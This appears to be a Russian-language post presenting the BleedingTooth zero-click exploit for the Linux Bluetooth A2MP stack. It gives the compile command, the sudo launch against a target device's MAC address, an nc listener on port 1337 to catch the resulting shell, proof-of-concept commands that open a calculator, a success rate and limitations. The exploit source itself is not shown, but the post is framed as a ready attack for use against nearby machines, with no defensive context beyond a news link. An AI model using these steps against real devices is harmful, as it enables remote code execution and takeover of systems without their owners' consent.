Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:

 $ gcc -o exploit BleedingTooth.c -lbluetooth

Запуск:

 $ sudo ./exploit MAC-адрес атакуемого устройства

В другом терминале выполнить:

 $ nc -lvp 1337

При успешной эксплуатации для запуска калькулятора выполнится:

$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator

Успешность: ~80% для целевой версии ядра.

Ограничения:
⏺Bluetooth должен быть активен и доступен для подключения.
⏺SELinux/AppArmor могут блокировать выполнение кода.
⏺Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux